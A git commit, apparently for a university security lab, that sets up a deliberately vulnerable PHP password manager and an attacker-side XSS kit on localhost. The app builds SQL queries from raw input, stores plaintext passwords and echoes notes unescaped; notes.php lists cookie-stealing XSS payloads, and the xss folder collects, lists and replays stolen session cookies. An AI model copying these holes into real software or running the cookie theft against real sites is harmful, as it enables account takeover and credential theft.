Dashboard

commit 61c777f33a2b40b1c024f3be982e7156210c0dce Author: Christos Choutouridis Date: Sat Jan 10 17:56:35 2026 +0200 Init commit with passman (and XSS) files aranged as a deployed environment diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..1389499 --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +# Generic files +*.zip + diff --git a/passman-dev/db/init/01-create-pwd_mgr-db-withData.sql b/passman-dev/db/init/01-create-pwd_mgr-db-withData.sql new file mode 100644 index 0000000..89fccd4 --- /dev/null +++ b/passman-dev/db/init/01-create-pwd_mgr-db-withData.sql @@ -0,0 +1,65 @@ +-- -------------------------------------------------------- +-- Host: 127.0.0.1 +-- Server version: 10.4.22-MariaDB - mariadb.org binary distribution +-- Server OS: Win64 +-- HeidiSQL Version: 12.7.0.6850 +-- -------------------------------------------------------- + +/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; +/*!40101 SET NAMES utf8 */; +/*!50503 SET NAMES utf8mb4 */; +/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; +/*!40103 SET TIME_ZONE='+00:00' */; +/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; +/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; +/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; + +CREATE DATABASE IF NOT EXISTS `pwd_mgr` /*!40100 DEFAULT CHARACTER SET latin1 */; +USE `pwd_mgr`; + +CREATE TABLE IF NOT EXISTS `dummy` ( + `id` int(11) DEFAULT NULL +) ENGINE=InnoDB DEFAULT CHARSET=latin1; + +CREATE TABLE IF NOT EXISTS `login_users` ( + `id` int(11) NOT NULL AUTO_INCREMENT, + `username` varchar(20) NOT NULL, + `password` varchar(256) NOT NULL DEFAULT '', + PRIMARY KEY (`id`), + UNIQUE KEY `user` (`username`) +) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1; + +INSERT INTO `login_users` (`id`, `username`, `password`) VALUES + (1, 'u1', 'p1'); + +CREATE TABLE IF NOT EXISTS `notes` ( + `notesid` int(11) NOT NULL AUTO_INCREMENT, + `login_user_id` int(11) DEFAULT NULL, + `note` varchar(300) NOT NULL, + PRIMARY KEY (`notesid`) USING BTREE, + KEY `FK_notes-login_users` (`login_user_id`) USING BTREE, + CONSTRAINT `FK_notes-login_users` FOREIGN KEY (`login_user_id`) REFERENCES `login_users` (`id`) ON DELETE CASCADE ON UPDATE CASCADE +) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=latin1; + +INSERT INTO `notes` (`notesid`, `login_user_id`, `note`) VALUES + (1, 1, 'test1'); + +CREATE TABLE IF NOT EXISTS `websites` ( + `webid` int(11) NOT NULL AUTO_INCREMENT, + `login_user_id` int(11) DEFAULT NULL, + `web_url` varchar(250) NOT NULL, + `web_username` varchar(20) NOT NULL DEFAULT '', + `web_password` varchar(300) NOT NULL DEFAULT '', + PRIMARY KEY (`webid`) USING BTREE, + KEY `FK_websites-login_users` (`login_user_id`), + CONSTRAINT `FK_websites-login_users` FOREIGN KEY (`login_user_id`) REFERENCES `login_users` (`id`) ON DELETE CASCADE ON UPDATE CASCADE +) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=latin1; + +INSERT INTO `websites` (`webid`, `login_user_id`, `web_url`, `web_username`, `web_password`) VALUES + (1, 1, 'www.test.com', 'tom', 'tompass'); + +/*!40103 SET TIME_ZONE=IFNULL(@OLD_TIME_ZONE, 'system') */; +/*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */; +/*!40014 SET FOREIGN_KEY_CHECKS=IFNULL(@OLD_FOREIGN_KEY_CHECKS, 1) */; +/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; +/*!40111 SET SQL_NOTES=IFNULL(@OLD_SQL_NOTES, 1) */; diff --git a/passman-dev/php/passman/dashboard.php b/passman-dev/php/passman/dashboard.php new file mode 100644 index 0000000..b5df1f8 --- /dev/null +++ b/passman-dev/php/passman/dashboard.php @@ -0,0 +1,126 @@ + + + + + + Dashboard + + + +query($sql_query); + $conn -> close(); + + // After processing, redirect to the same page to clear the form + unset($_POST['new_website']); + unset($_POST['new_username']); + unset($_POST['new_password']); + header("Location: " . $_SERVER['PHP_SELF']); + exit(); +} + +// Check if 'Delete-website' button was selected +if(isset($_POST['delete_website']) && trim($_POST["websiteid"] != '')) { + $webid = trim($_POST["websiteid"]); + + // Delete selected web site + $sql_query = "DELETE FROM websites WHERE webid='{$webid}';"; + //echo $sql_query; + $result = $conn->query($sql_query); + $conn -> close(); + + // After processing, redirect to the same page to clear the form + unset($_POST['websiteid']); + header("Location: " . $_SERVER['PHP_SELF']); + exit(); +} + +// Display list of user's web sites +$sql_query = "SELECT * FROM websites INNER JOIN login_users ON websites.login_user_id=login_users.id WHERE login_users.username='{$username}';"; +//echo $sql_query; +$result = $conn->query($sql_query); + +//echo htmlspecialchars($username); +echo "

Entries of " . $username . "

"; + +if (!empty($result) && $result->num_rows >= 1) { + while ($row = $result -> fetch_assoc()) { + echo ""; + echo "" . + ""; + + echo ""; + + echo ""; + echo "

" . $row["web_url"] . "
Username: " . $row["web_username"] . "	Password: " . $row["web_password"] . "
" . + "" . + "

"; + } + + // Free result set + $result -> free_result(); +} else { + echo "

No entries found.

"; +} + +$conn -> close(); + +?> + + +

+ Notes - announcements +

+ Logout +

+ Home page + + \ No newline at end of file diff --git a/passman-dev/php/passman/index.html b/passman-dev/php/passman/index.html new file mode 100644 index 0000000..af9a7e3 --- /dev/null +++ b/passman-dev/php/passman/index.html @@ -0,0 +1,59 @@ + + + + + + Password Manager + + + +

Password Manager - AUTH-ECE - 2025-2026

+ + +
+ List of Password Manager pages: +
+

+ Registration Form +

+ Login Page +

+ Logout Page +

+ Dashboard (display passwords for websites) +

+ Notes (notes/comments/announcements) +

+ +
+ Testing useful functions: +
+

+ Test hashing functions in PHP (server side) +

+ Test encrypting/decrypting functions in PHP (server side) +

+ +
+ Hacker's side (for using stealing cookies using XSS): + http://localhost/passman/xss +
+ + + \ No newline at end of file diff --git a/passman-dev/php/passman/login.php b/passman-dev/php/passman/login.php new file mode 100644 index 0000000..650ac9a --- /dev/null +++ b/passman-dev/php/passman/login.php @@ -0,0 +1,89 @@ + + + + + + Login Form + + +query($sql_query); + unset($_POST['username']); + unset($_POST['password']); + + if (!empty($result) && $result->num_rows >= 1) { + // Regenerate session ID to prevent session fixation! + //session_regenerate_id(true); + + // Successfully logged in + $_SESSION['username'] = $username; + $_SESSION['loggedin'] = true; + + //while ($row = $result -> fetch_assoc()) { + // print_r($row); + // $_SESSION['user_id'] = $row['id']; + //} + + // Free result set + $result -> free_result(); + $conn -> close(); + + // Redirect to a dashboard page + header("Location: dashboard.php"); + exit; + } else { + $login_message = "Invalid username or password"; + } + + $conn -> close(); + } +} +?> + + +

Password Manager

+ +
+ $login_message"; } ?> +

+ Register new user +

+ Home page + + \ No newline at end of file diff --git a/passman-dev/php/passman/logout.php b/passman-dev/php/passman/logout.php new file mode 100644 index 0000000..7899040 --- /dev/null +++ b/passman-dev/php/passman/logout.php @@ -0,0 +1,24 @@ +window.location.href = "login.php";'; +exit(); + +/* +if (session_status() !== PHP_SESSION_ACTIVE) :void +{ + session_start(); + session_unset(); + session_destroy(); + session_write_close(); + setcookie(session_name(), '', 0, '/'); + session_regenerate_id(true); +} +*/ +?> diff --git a/passman-dev/php/passman/notes.php b/passman-dev/php/passman/notes.php new file mode 100644 index 0000000..030917c --- /dev/null +++ b/passman-dev/php/passman/notes.php @@ -0,0 +1,173 @@ + + + + + + Notes - Comments + + + +alert(2); + XSS using string.fromCharCode with ASCII codes + XSS eval of Hex Unicode Escape Sequences + XSS console cookie + XSS steal cookie with fetch + + XSS steal cookie with simpler fetch + or + + // HAS PROBLEM: XSS steal cookie with href redirection + // HAS PROBLEM: XSS steal cookie with img on-error + */ + + // Insert new note + //$sql_query = "INSERT INTO notes (login_user_id,note) VALUES " . + // "((SELECT id FROM login_users WHERE username='{$username}'),('{$new_note}'));"; + + $sql_query = "INSERT INTO notes (login_user_id, note) ". + "VALUES ((SELECT id FROM login_users WHERE username='{$username}'), '{$new_note}')"; + + //echo $sql_query; + + $result = $conn->query($sql_query); + $conn -> close(); + + // After processing, redirect to the same page to clear the form + unset($_POST['new_note']); + header("Location: " . $_SERVER['PHP_SELF']); + exit(); +} + +// Display list of all notes/comments +$sql_query = "SELECT notes.note, login_users.username FROM notes INNER JOIN login_users ON notes.login_user_id=login_users.id;"; +//echo $sql_query; +$result = $conn->query($sql_query); + +echo "

List of notes/comments

"; + +if (!empty($result) && $result->num_rows >= 1) { + while ($row = $result -> fetch_assoc()) { + echo "

"; + echo "

" . $row["note"] . "

"; + echo "

by " . $row["username"] . "

"; + echo "

"; + } + + // Free result set + $result -> free_result(); +} else { + echo "

No entries found.

"; +} + +$conn -> close(); +?> + + +

+ + Dashboard +

+ Logout + + \ No newline at end of file diff --git a/passman-dev/php/passman/register.php b/passman-dev/php/passman/register.php new file mode 100644 index 0000000..d29e2dd --- /dev/null +++ b/passman-dev/php/passman/register.php @@ -0,0 +1,83 @@ + + + + + + Registration Form + + +

New user registration

+ +You are already logged in!
"; + echo "Please logout first"; + exit; +} + +if ($_SERVER["REQUEST_METHOD"] === "POST") { + if(!isset($_POST['new_username'], $_POST['new_password']) || trim($_POST['new_username']) =='' || trim($_POST['new_password']) == '') { + $login_message = "Missing username or password."; + } + else { + // Get user submitted information + $new_username = trim($_POST['new_username']); + $new_password = trim($_POST['new_password']); + + mysqli_report(MYSQLI_REPORT_OFF); // disable exceptions + + // Connect to the database + $conn=mysqli_connect("localhost","root","","pwd_mgr"); + // Check connection + if (mysqli_connect_errno()) { + echo "Failed to connect to MySQL: " . mysqli_connect_error(); + exit(); + } + + // Insert a new user + $sql_query = "INSERT INTO login_users (username,password) VALUES ('{$new_username}','{$new_password}');"; + //echo $sql_query; + + $result = $conn->query($sql_query); + + unset($_POST['new_username']); + unset($_POST['new_password']); + + if ($result == true) { + echo "Successful registration!"; + echo "

You can now use the login page"; + exit; + } + else + $login_message = "Error, probably user already exists!"; + + // Free result set + $conn -> close(); + } +} +?> + + + +

+ +
+ + $login_message"; + echo "

Go to the login page"; + } + ?> + + + \ No newline at end of file diff --git a/passman-dev/php/xss/getcookie.php b/passman-dev/php/xss/getcookie.php new file mode 100644 index 0000000..2ff3a76 --- /dev/null +++ b/passman-dev/php/xss/getcookie.php @@ -0,0 +1,47 @@ + + + + + + Get a cookie + + + +

Get a cookie

+ + + + + + \ No newline at end of file diff --git a/passman-dev/php/xss/index.html b/passman-dev/php/xss/index.html new file mode 100644 index 0000000..133aaa6 --- /dev/null +++ b/passman-dev/php/xss/index.html @@ -0,0 +1,36 @@ + + + + + + XSS for Password Manager + + + +

XSS for Password Manager

+ + +
+ List of pages: +
+

+ Get a cookie: getcookie.php +
used by XSS javascripts as: http://localhost/passman/xss/getcookie.php?v=PHPSESSID=o1mg400lipd2mck69kpfnl6p5s +

+ File of stolen cookies: stolencookies.txt +

+ List all cookies: listcookies.php +

+ Use of a cookie: usecookie.php +
used by listcookies.php as http://localhost/passman/xss/usecookie.php?v=3h9ug308730bfugjjse0dbmcjr +

+ + \ No newline at end of file diff --git a/passman-dev/php/xss/listcookies.php b/passman-dev/php/xss/listcookies.php new file mode 100644 index 0000000..1d4b1ea --- /dev/null +++ b/passman-dev/php/xss/listcookies.php @@ -0,0 +1,62 @@ + + + + + + List stolen cookies + + + +

List of 'stolen' cookies

+ +modify('+2 minutes'); // Add 2 minutes + $expiration = $expires->format('D, d M Y H:i:s') . ' GMT'; +*/ + // Process each line + echo "

"; + echo ""; + echo "PHPSESSID=" . htmlspecialchars($cookie) . ""; + echo "
"; + echo " Skipping cookie: " . htmlspecialchars($cookie); + echo "

"; +} else { + // Error message if file does not exist + echo "

Cookie file not found.

"; +} +?> + + + \ No newline at end of file diff --git a/passman-dev/php/xss/stolencookies.txt b/passman-dev/php/xss/stolencookies.txt new file mode 100644 index 0000000..92e4006 --- /dev/null +++ b/passman-dev/php/xss/stolencookies.txt @@ -0,0 +1,2 @@ +PHPSESSID=knjfug3u4gavdas9o4eupe38l1; seclab_user=u1 +seclab_user=u1; PHPSESSID=o1mg400lipd2mck69kpfnl6p5s diff --git a/passman-dev/php/xss/usecookie.php b/passman-dev/php/xss/usecookie.php new file mode 100644 index 0000000..729daba --- /dev/null +++ b/passman-dev/php/xss/usecookie.php @@ -0,0 +1,59 @@ + + + + + + + + Test of using a stolen cookie + + + +

Test of using a stolen cookie

+ Bypassing authentication and impersonating another user by using a stolen cookie
+ +PHPSESSID=" . session_id() . "
"; + +/* +if (isset($_SESSION['loggedin']) && $_SESSION['username'] !== '') { + echo "Username: " . $_SESSION['username'] . "
"; + echo "Logged in: " . $_SESSION['loggedin'] . "
"; +} +else { + echo "session variables expired"; +} +*/ +// If session parameter is not set, set it to: 'undefined ...' +$username = $_SESSION['username'] ?? 'undefined (session variable expired)'; +$loggedin = $_SESSION['loggedin'] ?? 'undefined (session variable expired)'; +echo "Username: " . $username . "
"; +echo "Logged in flag: " . $loggedin . "
"; +?> + +
+ If all above session parameters are defined, try accessing the + dashboard + +

+ List cookies + + + \ No newline at end of file diff --git a/Εργασία-Ασφάλειας 2025-2026.pdf b/Εργασία-Ασφάλειας 2025-2026.pdf new file mode 100644 index 0000000..6cfb3d0 Binary files /dev/null and b/Εργασία-Ασφάλειας 2025-2026.pdf differ